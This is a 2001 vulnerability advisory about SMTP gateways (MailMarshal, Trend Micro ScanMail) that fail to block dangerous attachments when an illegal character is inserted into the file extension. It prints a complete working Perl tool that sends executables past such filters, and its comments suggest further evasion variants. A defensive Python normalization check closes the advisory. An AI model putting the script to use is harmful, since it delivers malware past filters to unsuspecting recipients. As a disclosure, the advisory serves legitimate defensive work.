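Multiple Vendor Attachment Protection Bypass Vulnerability
Published: 2001-07-25
Updated: 2001-08-01
Affected systems:
Softek MailMarshal 4.2
Softek MailMarshal 4.1
Softek MailMarshal 4.0
Trend Micro ScanMail 1.0
Description:
BUGTRAQ ID : 3097
At least two SMTP gateway products have been confirmed to be flawed in how they
handle restricted file types sent as attachments.
An attacker can insert special characters into the file extension of an
attachment, which bypasses the checks performed by these SMTP gateway products.
Microsoft Outlook, however, automatically removes the illegal characters from
the file extension, so an executable attachment with a valid extension is
delivered to the recipient.
<*Source: Huskey, Clark (Huskeycd@agedwards.com)*>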
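Test method:
Warning
The following program (method) may be offensive in nature and is provided for
security research and teaching purposes only. Use at your own risk!
Aidan (aidan.ok@oceanfree.net) provided the following test code: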
#!/usr/bin/perl
# attqt.pl 0.1 by Aidan O'Kelly July 2001
# Send banned attachments through SMTP gateways, this works because MS
# Outlook removes illegal characters in filenames. So when you put an
# illegal char (such as ") in the extension. The Gateway will not recognize
# it as a dangerous attachment. However, when the user on the other end
# opens it the illegal char will be removed.
#
# Feedback welcome. aidan.ok@oceanfree.net
#
# This is known to work on MailMarshal and TrendMicro Scanmail. Others
# have not been tested but most are probably vulnerable. If it works on any
# others, please mail me and let me know.
# This only puts in one quote after the dot (eg virus."vbs or virus."exe)
# Some gateways might still pick up on the vbs. you can put in more or
# different characters like virus.%v"b********s if you feel like it.
# $filename =~ s/\./\.\"/g; is the line that changes it.
use Getopt::Std;
use MIME::Base64 qw(encode_base64);
use IO::Socket::INET;
getopt('atfhsb');
if (!$opt_a || !$opt_f || !$opt_t || !$opt_h)
{
    print "Usage: attqt.pl <-a attachment> <-t to> <-f from> <-h smtphost> [-s subject] [-b text]\n";
    exit;
}
open(FILE, $opt_a) or die "$!";
binmode FILE;
while (read(FILE, $buf, 60*57)) {
    $attachment = $attachment . encode_base64($buf);
}
close(FILE);
$filename = $opt_a;
$filename =~ s/\./\.\"/g;
print "$filename\n";
$sock = IO::Socket::INET->new(PeerAddr => "$opt_h",PeerPort => '25', Proto => 'tcp');
unless (<$sock> =~ "220") { die "Not a SMTP Server?" }
print $sock "HELO you\r\n";
unless (<$sock> =~ "250") { die "HELO failed" }
print $sock "MAIL FROM:<>\r\n";
unless (<$sock> =~ "250") { die "MAIL FROM failed" }
print $sock "RCPT TO:<$opt_t>\r\n";
unless (<$sock> =~ "250") { die "RCPT TO failed" }
print $sock "DATA\r\n";
unless (<$sock> =~ "354") { die "DATA failed" }
print $sock "From: $opt_f\n";
print $sock "To: $opt_t\n";
print $sock "Subject: $opt_s\n";
print $sock "MIME-Version: 1.0
Content-Type: multipart/related;
type=\"multipart/alternative\";
boundary=\"NextPart19\"
This is a multi-part message in MIME format.
--NextPart19
Content-Type: multipart/alternative;
boundary=\"NextPart20\"
--NextPart20
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
--NextPart20
Content-Type: text/html;
charset=\"iso-8859-1\"
Content-Transfer-Encoding: quoted-printable
";
print $sock "$opt_b\n";
print $sock "--NextPart20--
--NextPart19
Content-Type: application/x-msdownload
Content-Disposition: attachment;filename=\"$filename\"
Content-Transfer-Encoding: base64\r\n\n";
print $sock $attachment;
print $sock "\r\n--NextPart19--\n.\n";
print "Finished sending data\n";
$a = <$sock>;
print "$a\n";
close($sock);
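Recommendation:
Vendor patch:
The vendors have not yet provided a patch or upgrade. We recommend that users
of this software watch the vendors' home pages for the latest versions:
http://www.softek.co.uk/
http://www.antivirus.com/products/smex/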
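The mismatch described above can be closed at the gateway by normalizing each attachment file name the way the mail client would before matching it against the blocked-extension list. The following Python check is an added example, not code from the advisory or from either vendor; the blocked-extension list, the set of stripped characters (those Windows forbids in file names) and the sample message are assumptions constructed for illustration.

```python
import re
from email import message_from_string

# Assumed policy list for this example, not taken from any product.
BLOCKED = {"exe", "vbs", "scr", "pif", "bat", "com"}
# Assumption: the client strips what Windows forbids in file names.
ILLEGAL = re.compile(r'[\x00-\x1f\\/:*?"<>|]')

def literal_extension(name):
    """Extension exactly as it appears in the header (the flawed check)."""
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""

def normalized_extension(name):
    """Extension after removing characters the client would strip."""
    cleaned = ILLEGAL.sub("", name).rstrip(". ")
    return literal_extension(cleaned)

def scan(raw_message):
    """Return (filename, literal_hit, normalized_hit) per named MIME part."""
    hits = []
    for part in message_from_string(raw_message).walk():
        name = part.get_filename()
        if name is not None:
            hits.append((name,
                         literal_extension(name) in BLOCKED,
                         normalized_extension(name) in BLOCKED))
    return hits

# Constructed sample: harmless text body, file name shaped as in the advisory.
SAMPLE = "\n".join([
    "From: sender@example.com",
    "To: rcpt@example.com",
    "MIME-Version: 1.0",
    'Content-Type: multipart/mixed; boundary="B1"',
    "",
    "--B1",
    "Content-Type: text/plain",
    "",
    "body text",
    "--B1",
    "Content-Type: application/octet-stream",
    'Content-Disposition: attachment; filename="report."vbs"',
    "",
    "placeholder",
    "--B1--",
])

if __name__ == "__main__":
    print(scan(SAMPLE))
```

A stricter policy is to reject any attachment whose file name changes under normalization, rather than only matching the cleaned extension.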